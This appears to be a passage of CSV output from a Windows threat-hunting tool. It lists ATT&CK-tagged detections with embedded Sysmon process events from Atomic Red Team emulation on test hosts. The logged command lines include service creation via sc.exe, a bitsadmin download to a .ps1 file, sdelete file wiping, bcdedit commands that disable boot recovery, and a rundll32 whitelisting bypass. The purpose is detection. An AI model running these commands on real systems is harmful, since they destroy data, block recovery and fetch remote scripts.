"sc.exe delete AtomicTestService" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3585 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:44:09.225 + 747F3D96-D739-5D31-0000-0010E4BB2600 + 4744 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "sc.exe delete AtomicTestService" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547449.17604,2019-07-19T18:44:09.176040+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "sc.exe stop AtomicTestService" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3583 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:44:09.142 + 747F3D96-D739-5D31-0000-00104CB72600 + 5000 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "sc.exe stop AtomicTestService" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1543 ] Sc.exe manipulating windows services,1563547448.307214,2019-07-19T18:44:08.307214+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to manipulate windows services usign Sc.exe with Command Line (sc.exe start AtomicTestService) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine ("C:\Windows\system32\cmd.exe" /c "sc.exe start AtomicTestService") in directory : ( C:\AtomicRedTeam\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3581 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Persistence or Exec - Services Management + 2019-07-19 14:44:08.269 + 747F3D96-D738-5D31-0000-0010D8AA2600 + 4260 + C:\Windows\System32\sc.exe + 10.0.17763.1 (WinBuild.160101.0800) + Service Control Manager Configuration Tool + Microsoft® Windows® Operating System + Microsoft Corporation + sc.exe start AtomicTestService + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF + 747F3D96-D738-5D31-0000-001056A62600 + 2556 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "sc.exe start AtomicTestService" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547448.288861,2019-07-19T18:44:08.288861+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "sc.exe start AtomicTestService" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3580 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:44:08.227 + 747F3D96-D738-5D31-0000-001056A62600 + 2556 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "sc.exe start AtomicTestService" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1543 ] Sc.exe manipulating windows services,1563547448.221461,2019-07-19T18:44:08.221461+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to manipulate windows services usign Sc.exe with Command Line (sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine ("C:\Windows\system32\cmd.exe" /c "sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe") in directory : ( C:\AtomicRedTeam\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3577 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Persistence or Exec - Services Management + 2019-07-19 14:44:08.181 + 747F3D96-D738-5D31-0000-001098A22600 + 1700 + C:\Windows\System32\sc.exe + 10.0.17763.1 (WinBuild.160101.0800) + Service Control Manager Configuration Tool + Microsoft® Windows® Operating System + Microsoft Corporation + sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF + 747F3D96-D738-5D31-0000-001046A02600 + 4216 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547448.185344,2019-07-19T18:44:08.185344+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3576 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:44:08.146 + 747F3D96-D738-5D31-0000-001046A02600 + 4216 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1553031677.339046,2019-03-20T01:41:17.339046+04:00,,Threat,Low,Found User (EXAMPLE\user01) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.EXE /c malwr.vbs ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966563 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 21:41:17.288 + 365ABB72-61FD-5C91-0000-0010536A1200 + 2340 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\cmd.EXE /c malwr.vbs + C:\Windows\system32\ + EXAMPLE\user01 + 365ABB72-5417-5C91-0000-002035340300 + 0x33435 + 1 + High + MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-528D-5C91-0000-001062560000 + 484 + C:\Windows\System32\services.exe + C:\Windows\system32\services.exe + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[ T1086 ] Powershell with Suspicious Argument,1563547426.623217,2019-07-19T18:43:46.623217+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include (powershell) in event with Command Line (powershell) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine ("C:\Windows\system32\cmd.exe") in directory : ( c:\AtomicRedTeam\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3574 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:43:03.271 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + powershell + c:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-D6ED-5D31-0000-0010C88A2500 + 3764 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1086] PowerShell Process found,1563547426.623217,2019-07-19T18:43:46.623217+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3574 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:43:03.271 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + powershell + c:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-D6ED-5D31-0000-0010C88A2500 + 3764 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547383.303217,2019-07-19T18:43:03.303217+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3573 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:42:53.277 + 747F3D96-D6ED-5D31-0000-0010C88A2500 + 3764 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D4B8-5D31-0000-0010A8CE0600 + 4416 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547710.660877,2019-07-19T18:48:30.660877+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /create AtomicBITS" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3657 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:30.619 + 747F3D96-D83E-5D31-0000-0010F0D02E00 + 752 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /create AtomicBITS" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1553030551.500169,2019-03-20T01:22:31.500169+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966541 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 21:22:28.806 + 365ABB72-5D94-5C91-0000-001080E90F00 + 3840 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb + C:\Windows\AppPatch\Custom\ + EXAMPLE\user01 + 365ABB72-5417-5C91-0000-002035340300 + 0x33435 + 1 + High + MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-543D-5C91-0000-001099A60300 + 2984 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1553030551.500169,2019-03-20T01:22:31.500169+04:00,,Threat,High,"Found User (EXAMPLE\user01) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966541 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 21:22:28.806 + 365ABB72-5D94-5C91-0000-001080E90F00 + 3840 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb + C:\Windows\AppPatch\Custom\ + EXAMPLE\user01 + 365ABB72-5417-5C91-0000-002035340300 + 0x33435 + 1 + High + MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-543D-5C91-0000-001099A60300 + 2984 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547710.640915,2019-07-19T18:48:30.640915+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3656 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:05.349 + 747F3D96-D825-5D31-0000-0010CF222C00 + 5808 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1553030551.500169,2019-03-20T01:22:31.500169+04:00,,Threat,High,"Found User (EXAMPLE\user01) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966541 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 21:22:28.806 + 365ABB72-5D94-5C91-0000-001080E90F00 + 3840 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb + C:\Windows\AppPatch\Custom\ + EXAMPLE\user01 + 365ABB72-5417-5C91-0000-002035340300 + 0x33435 + 1 + High + MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-543D-5C91-0000-001099A60300 + 2984 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547684.13141,2019-07-19T18:48:04.131410+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3654 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:04.094 + 747F3D96-D824-5D31-0000-001023F42B00 + 6736 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547684.103366,2019-07-19T18:48:04.103366+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3653 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:47:57.265 + 747F3D96-D81D-5D31-0000-0010D7CD2B00 + 7080 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547677.274199,2019-07-19T18:47:57.274199+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "sdelete.exe C:\some\file.txt" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3652 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:47:57.189 + 747F3D96-D81D-5D31-0000-0010B8CA2B00 + 1632 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "sdelete.exe C:\some\file.txt" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547677.227966,2019-07-19T18:47:57.227966+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3651 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:47:51.972 + 747F3D96-D817-5D31-0000-0010C8BA2B00 + 7040 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547672.010791,2019-07-19T18:47:52.010791+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "bcdedit.exe /set {default} recoveryenabled no" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3649 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:47:51.899 + 747F3D96-D817-5D31-0000-001049B42B00 + 6216 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "bcdedit.exe /set {default} recoveryenabled no" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547671.865963,2019-07-19T18:47:51.865963+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3647 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:47:51.784 + 747F3D96-D817-5D31-0000-001064AD2B00 + 6508 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547666.302556,2019-07-19T18:47:46.302556+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3645 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:47:46.104 + 